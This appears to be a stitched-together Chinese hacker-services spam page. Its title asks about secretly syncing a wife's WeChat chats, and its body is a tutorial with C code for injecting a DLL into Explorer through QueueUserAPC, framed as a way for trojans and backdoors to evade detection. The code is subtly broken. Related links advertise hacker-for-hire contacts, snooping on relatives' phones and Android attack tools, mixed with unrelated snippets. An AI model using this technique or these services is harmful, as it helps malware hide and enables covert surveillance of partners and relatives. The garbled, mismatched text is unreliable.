有什么软件可以同步我老婆的微信聊天记录 不需

访客3年前黑客工具406

向一个运行中的进程注入自己的代码,最自然莫过于使用CreateRemoteThread,如今远线程注入已经是泛滥成灾,同样的监测远线程注入、防止远线程注入的工具也举不胜举,一个木马或后门启动时向Explorer或IE的注入操作就像在自己脸上写上“我是贼”一样。 用户态代码想要更隐蔽地藏身于别的进程,就应该在注入的环节隐蔽自己的行为。下面就介绍一种非常简单不过比较暴力的 *** ,给出的示例为在Explorer里加载自己的dll。 首先提到的就是一个API:QueueUserAPC DWORD QueueUserAPC( PAPCFUNC pfnAPC, // APC function HANDLE hThread, // handle to thread ULONG_PTR dwData // APC function parameter ; 大家对这个API应该并不陌生,它直接转入了系统服务NtQueueApcThread从而利用KeInsertQueueApc向给出的目标线程的APC队列插入一APC对象。倘若KiDeliverApc顺利的去构造apc环境并执行我们的代码那一切就OK了,只可惜没有那么顺利的事,ApcState中UserApcPending是否为TRUE有重要的影响,结果往往是你等到花儿都谢了你的代码还是没得到执行。在核心态往往不成问题,自己动手赋值,可是用户态程序可不好做,怎么办?其实最简单的,不好做就不做啰,让系统去干。 实际上应用程序在请求“alertable”的等待时系统就会置UserApcPending为TRUE(当KeDelayExecutionThread/KeWaitForMultipleObjects/KeWaitForSingleObject 使用TestForAlertPending时就有可能,此外还有KeTestAlertThread等,机会还是有的),最简单的例子,目标线程调用SleepEx(***, TRUE)后我们插入APC代码就会乖乖执行了。 比较幸运的是Explorer进程中一般情况下总有合我们意的线程,于是最简单但并不优美的办法就是枚举Explorer中所有线程,全数插入,示意如下:   ...... DWORD ret; char *DllName = "c:\\MyDll.dll"; int len = strlen(DllName) + 1; PVOID param = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_TOP_DOWN, PAGE_READWRITE); if (param != NULL) { if (WriteProcessMemory(hProcess, param, (LPVOID)DllName, len, &ret)) { for (DWORD p = 0; p < NumberOfThreads; p ++) { hThread = OpenThread(THREAD_ALL_ACCESS, 0, ThreadId[p]); if (hThread != 0) { InjectDll(hProcess, hThread, (DWORD)param); CloseHandle(hThread); } } } ...... 其中InjectDll: void InjectDll(HANDLE hProcess, HANDLE hThread, DWORD param) { QueueUserAPC( (PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll", "LoadLibraryA", hThread, (DWORD)param ; }

相关文章

曼达阁黑客团队靠谱吗(曼达洛人)-靠谱的黑客联系方式 微博

曼达阁黑客团队靠谱吗(曼达洛人)-靠谱的黑客联系方式 微博

曼达阁黑客团队靠谱吗(曼达洛人)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业务、...

找个私人侦探要多少钱_不要钱的黑客联系方式

这种小常识,助你写好通信! 许多 新闻人都喜爱写通信,它是件好事儿。但要写成一篇精彩纷呈的通信也并非易事,最先必须在基础知识左右点时间才行。 下边详细介绍写好通信的好多个小常识,别以为其小,用心赏读...

清华大学黑客专业介绍(清华大学网络安全专业课程)

清华大学黑客专业介绍(清华大学网络安全专业课程)

本文导读目录: 1、清华大学的计算机系4年有能力把一个本来计算机方面什么也不懂的人培养成出色的黑客吗 2、清华信息安全专业 3、清华信息安全专业和北大信息安全专业比较 4、清华大学计算机系...

选择什么数据指标进行产品评估?(二)

选择什么数据指标进行产品评估?(二)

编辑导语:在上篇文章选择什么数据指标举办产物评估?(一)中,作者分享了关于数据指标的宏观和围观指标;本文作者环绕单用户代价展开,从个别和整体的角度举办阐明,我们一起来看一下。 上篇文章中,我凭据产物...

怎么看亲戚手机上的聊天记录

2015年创办的神州半岛队际高尔夫球擂台赛,倡导“比赛+度假”办赛理念,以独特的循环攻擂赛制,让赛事整体既有比赛严肃性、竞技性,又让参赛的球友享受到度假的感觉,深受国内外球友的喜爱和追捧!今年,11月...

安卓攻击软件(ip攻击安卓软件)

安卓攻击软件(ip攻击安卓软件)

本文导读目录: 1、有没有人有崩坏三安卓版的修改攻击力的软件的 2、有没有安卓版的ARP攻击软件?基于win的ARP攻击软件有很多,但是基于安卓版的不知道网上有没有??? 3、有哪些无线网络攻...